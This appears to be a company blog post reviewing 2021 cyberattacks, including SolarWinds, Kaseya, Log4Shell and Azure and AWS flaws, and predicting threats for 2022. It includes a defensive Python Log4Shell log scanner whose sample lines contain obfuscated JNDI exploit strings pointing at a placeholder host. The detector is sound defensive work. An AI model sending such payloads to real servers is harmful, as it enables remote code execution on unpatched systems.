The last few years have been anything but routine, both in terms of cybersecurity and business in general. The COVID-19 pandemic has permanently altered the way business is conducted, and cybercriminals have adjusted their tactics to fit the new reality. While cyberattacks were particularly severe in 2020 and 2021, there is little reason to believe that things will return to “normal” in 2022. Cyber-threat actors have experimented with new tactics and techniques, found them to be effective, and have incorporated them into their arsenal.
As the effects of cyberattacks were felt far beyond their target companies in 2021, several attack campaigns and threat actors became household names. As cybercrime becomes more professionalized and threat actors seek to extract maximum value or impact from their attacks, the modern threat landscape is made up of bigger, flashier, and higher-impact attacks.
We take a closer look at the major challenges that businesses faced in 2021 and what they can expect in 2022 in the following sections.
Cyberattacks Are on the Rise
Every year, cybercriminals focus their efforts on a particularly effective or lucrative attack technique, such as ransomware or cryptojacking, and certain threats grow exponentially. However, the rise of cybercrime across the board was one of the most concerning trends in 2021.
The total number of cyberattacks increased by 50% year over year in 2021. However, some areas were hit harder than others, with education, research, and healthcare suffering the most. This indicates that cyber threat actors are concentrating their efforts on areas that are rapidly becoming more reliant on technology while also being the least prepared to defend themselves against cyber threats.
Attacks are increasing at an alarming rate, which bodes ill for 2022. The number and severity of cyberattacks will only increase as threat actors refine their techniques and adopt machine learning and automation.
Supply Chain Attacks Are Becoming More Common
Supply chain attacks became more prevalent in late 2020, grew in 2021, and are expected to remain a major threat in 2022. This trend began in December 2020, when the SolarWinds hack was discovered.
Threat actors gained access to SolarWinds’ development environment and installed backdoor code in the company’s Orion network monitoring software. The discovery of the Sunburst malware sparked an extensive investigation that unearthed not only the details of the SolarWinds hack, but also multiple malware variants and an attack campaign affecting over 18,000 public and private sector organizations.
SolarWinds sparked a spike in supply chain attacks that lasted well into 2021 and 2022. The Kaseya attack, which abused the relationship between managed service providers (MSPs) and their customers to distribute ransomware through the MSPs’ remote monitoring and management software, was another high-profile supply chain exploit in 2021. A few months later, an attacker with access to the npm account of a widely used library (ua-parser-js) modified the code so that anyone who downloaded and used the malicious version had malware installed on their systems.
While these and other 2021 supply chain attacks had a wide-ranging impact, the exploitation of the Log4j zero-day vulnerability is likely the most well-known. The zero-day vulnerability in Log4j, a widely used Apache logging library, allowed an attacker with control over the contents of log messages or their parameters to gain remote code execution. The “Log4Shell” flaw was widely exploited, with Check Point Research detecting 40,000 attempted attacks in the first two hours after it was made public, and over 830,000 in the first three days.
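Because the Log4Shell flaw is triggered by attacker-controlled text reaching a log call, the usual first defensive step is to scan web-server and application logs for the lookup pattern. The following detector is an added example, not Check Point’s or Apache’s code: it normalizes the common URL-encoded and nested-lookup forms that naive string matching misses, then flags lines containing a JNDI lookup. The log lines are constructed samples, and the IP addresses are documentation-range placeholders.

```python
import re
from urllib.parse import unquote

# Innermost lookups that resolve to literal text: ${lower:j}, ${upper:N}, ${xyz:-j}
_LOWER = re.compile(r"\$\{lower:([^${}]*)\}", re.I)
_UPPER = re.compile(r"\$\{upper:([^${}]*)\}", re.I)
_DEFAULT = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")  # default-value form, e.g. ${::-j}
_JNDI = re.compile(r"\$\{\s*jndi\s*:")


def normalize(line: str) -> str:
    """Undo URL encoding and collapse nested lookups, innermost first, until stable."""
    s = unquote(line)
    prev = None
    while prev != s:
        prev = s
        s = _LOWER.sub(lambda m: m.group(1).lower(), s)
        s = _UPPER.sub(lambda m: m.group(1).upper(), s)
        s = _DEFAULT.sub(lambda m: m.group(1), s)
    return s.lower()


def is_log4shell_probe(line: str) -> bool:
    """True if the line contains a JNDI lookup after normalization."""
    return _JNDI.search(normalize(line)) is not None


# Constructed sample access-log lines (not from any real system).
SAMPLE_LINES = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://203.0.113.10/a}"',
    '10.0.0.9 - - "GET /?x=%24%7Bjndi%3Armi%3A%2F%2F203.0.113.10%2Fb HTTP/1.1" 400 "-"',
    '10.0.0.7 - - "GET /search?q=${date:yyyy} HTTP/1.1" 200 "curl/7.68"',
]


def scan(lines):
    """Return the indexes of lines that look like Log4Shell probes."""
    return [i for i, line in enumerate(lines) if is_log4shell_probe(line)]


if __name__ == "__main__":
    for i in scan(SAMPLE_LINES):
        print(f"suspicious line {i}: {SAMPLE_LINES[i]}")
```

The last sample line uses a non-JNDI lookup (`${date:...}`) and is deliberately not flagged, so the rule alerts on the dangerous lookup rather than on every `${` in a log.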
The high-profile supply chain attacks of 2021 showed that it is a viable and potentially lucrative attack vector for cyber threat actors. By 2022, cyber threat actors are likely to increase their use of supply chain attacks to broaden their attack’s reach and impact.
The Pandemic of Cybercrime Isn’t Over Yet
The COVID-19 pandemic ushered in a sea change in business practices. Instead of working primarily from the corporate office, a much larger percentage of the workforce now works remotely, and this trend is likely to continue in the near future.
As cyber threat actors adapted to and took advantage of changes in corporate IT operations, the pandemic sparked a cyber pandemic. The rise of remote work turned employees’ computers – often personal devices – into a company’s first line of defence, and the rapid adoption of cloud services to support the remote workforce and meet digital transformation goals opened up new attack vectors for cyber threat actors.
Little has changed in the two years since the pandemic began. Many businesses continue to support a mostly or entirely remote workforce, and cloud adoption is increasing. Companies are struggling to secure their systems and protect corporate and customer data as cybercriminals continue to take advantage of the vulnerabilities and security gaps created by this rapid IT transformation.
The Cloud Is a Primary Target
The rapid adoption of cloud-based infrastructure and services coincided with the pandemic-inspired shift to remote work. Cloud-based infrastructure was more accessible and easier to manage for a remote workforce, and Software as a Service (SaaS) solutions filled critical gaps, such as the need for online meetings and file sharing.
Since the rapid shift to remote work and the cloud in 2020, companies have had time to close many of the biggest security gaps created by a transition made with little or no advance planning. However, some cloud security gaps remain, and cyber threat actors continue to work to outpace security personnel in exploiting cloud computing’s newfound importance in modern business.
Many of these attacks target flaws in the cloud infrastructure itself, allowing an attacker to attack multiple targets with a single flaw. The OMIGOD vulnerability was discovered in September 2021. Until Microsoft’s Open Management Infrastructure (OMI) software agents embedded within Azure VMs were patched, attackers could have targeted up to 65 percent of Azure customers.
In 2021, OMIGOD was not the only security flaw discovered in Azure. Through a compromised key, the ChaosDB vulnerability discovered in August gave attackers complete control over Azure Cosmos DB clients’ cloud resources. Azurescape homed in on Azure’s Container as a Service (CaaS) offering, which lets customers run their Kubernetes clusters within the same public cloud service. Although Azurescape was patched before it was exploited, the consequences could have been severe.
In 2021, Azure was not the only cloud service that experienced vulnerabilities and attacks. Google Compute Engine (GCE), the basis of Google Cloud’s Infrastructure as a Service (IaaS) offering, had a vulnerability that could have allowed complete takeovers of hosted virtual machines. HTTP header smuggling against AWS’ API Gateway and Cognito (its authentication provider) could be used to evade access restrictions and perform cache poisoning. And due to a configuration error in AWS permissions, AWS support personnel may have been able to read the data stored in S3 buckets rather than just the metadata.
Increased cloud adoption attracts more scrutiny from ethical hackers as well as cyber threat actors. More cloud security issues are likely to be discovered in 2022 and beyond, based on the example of 2021.
Defending Against Changing Threats Will Be a Top Priority in 2022
As 2021 showed, cyber threat actors are adapting their techniques to fit a changing world and a maturing cybercrime industry. Rather than hiding in the shadows, cybercriminals are launching global supply chain attacks, disrupting key industries with ransomware, and adapting their tactics to a more mobile and cloud-centric workforce.
Companies can expect sophisticated attacks targeting every part of their IT infrastructure in 2022, particularly where it is weakest. Because companies lack critical visibility and control in the cloud and on bring-your-own-device (BYOD) endpoints, cybercriminals are focusing their efforts there.
Modern cyber threat campaigns necessitate the ability to respond quickly and accurately to rapidly evolving attacks that can strike anywhere in an organization’s IT infrastructure. Comprehensive security visibility, real-time threat intelligence, and an integrated security architecture that can support automated and coordinated threat prevention and response across the entire corporate IT infrastructure are all requirements.
The Nihka Technology Group is a South African technology company based in Johannesburg, South Africa. The Group is focused on bringing the digital future to both the private and public sectors, locally and globally by delivering innovative, integrated technologies and intelligent solutions. Nihka offers end-to-end multi-dimensional consulting with an emphasis on integrating the human potential. Bringing EQ into AI.
www.nihka.co.za